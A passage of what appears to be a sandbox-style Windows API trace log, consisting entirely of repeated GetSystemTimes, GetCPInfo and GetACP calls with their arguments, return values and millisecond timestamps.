lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.429] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.429] GetACP () returned 0x4e4 [0079.429] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.429] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.429] GetACP () returned 0x4e4 [0079.429] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.429] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.429] GetACP () returned 0x4e4 [0079.429] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.429] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.429] GetACP () returned 0x4e4 [0079.429] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.429] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.429] GetACP () returned 0x4e4 [0079.429] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.430] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.430] GetACP () returned 0x4e4 [0079.430] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.430] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.430] GetACP () returned 0x4e4 [0079.430] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.430] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.430] GetACP () returned 0x4e4 [0079.430] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.430] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.430] GetACP () returned 0x4e4 [0079.430] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.430] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.431] GetACP () returned 0x4e4 [0079.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.431] GetACP () returned 0x4e4 [0079.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.431] GetACP () returned 0x4e4 [0079.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.431] GetACP () returned 0x4e4 [0079.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.432] GetACP () returned 0x4e4 [0079.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.432] GetACP () returned 0x4e4 [0079.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.432] GetACP () returned 0x4e4 [0079.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.432] GetACP () returned 0x4e4 [0079.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.432] GetACP () returned 0x4e4 [0079.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.433] GetACP () returned 0x4e4 [0079.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.433] GetACP () returned 0x4e4 [0079.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.433] GetACP () returned 0x4e4 [0079.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.433] GetACP () returned 0x4e4 [0079.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.434] GetACP () returned 0x4e4 [0079.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.434] GetACP () returned 0x4e4 [0079.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.434] GetACP () returned 0x4e4 [0079.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.435] GetACP () returned 0x4e4 [0079.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.435] GetACP () returned 0x4e4 [0079.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.435] GetACP () returned 0x4e4 [0079.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.435] GetACP () returned 0x4e4 [0079.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.436] GetACP () returned 0x4e4 [0079.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.436] GetACP () returned 0x4e4 [0079.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.436] GetACP () returned 0x4e4 [0079.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.436] GetACP () returned 0x4e4 [0079.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.437] GetACP () returned 0x4e4 [0079.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.437] GetACP () returned 0x4e4 [0079.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.437] GetACP () returned 0x4e4 [0079.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.437] GetACP () returned 0x4e4 [0079.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.437] GetACP () returned 0x4e4 [0079.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.438] GetACP () returned 0x4e4 [0079.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.438] GetACP () returned 0x4e4 [0079.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.438] GetACP () returned 0x4e4 [0079.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.439] GetACP () returned 0x4e4 [0079.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.439] GetACP () returned 0x4e4 [0079.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.439] GetACP () returned 0x4e4 [0079.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.440] GetACP () returned 0x4e4 [0079.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.440] GetACP () returned 0x4e4 [0079.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.440] GetACP () returned 0x4e4 [0079.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.440] GetACP () returned 0x4e4 [0079.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.441] GetACP () returned 0x4e4 [0079.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.441] GetACP () returned 0x4e4 [0079.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.441] GetACP () returned 0x4e4 [0079.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.441] GetACP () returned 0x4e4 [0079.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.441] GetACP () returned 0x4e4 [0079.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.442] GetACP () returned 0x4e4 [0079.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.442] GetACP () returned 0x4e4 [0079.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.442] GetACP () returned 0x4e4 [0079.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.442] GetACP () returned 0x4e4 [0079.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.443] GetACP () returned 0x4e4 [0079.443] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.443] GetACP () returned 0x4e4 [0079.443] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.444] GetACP () returned 0x4e4 [0079.444] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.444] GetACP () returned 0x4e4 [0079.444] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.445] GetACP () returned 0x4e4 [0079.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.445] GetACP () returned 0x4e4 [0079.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.445] GetACP () returned 0x4e4 [0079.445] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.446] GetACP () returned 0x4e4 [0079.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.446] GetACP () returned 0x4e4 [0079.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.446] GetACP () returned 0x4e4 [0079.446] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.447] GetACP () returned 0x4e4 [0079.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.447] GetACP () returned 0x4e4 [0079.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.447] GetACP () returned 0x4e4 [0079.447] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.448] GetACP () returned 0x4e4 [0079.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.448] GetACP () returned 0x4e4 [0079.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.448] GetACP () returned 0x4e4 [0079.448] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.449] GetACP () returned 0x4e4 [0079.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.449] GetACP () returned 0x4e4 [0079.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.449] GetACP () returned 0x4e4 [0079.449] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.450] 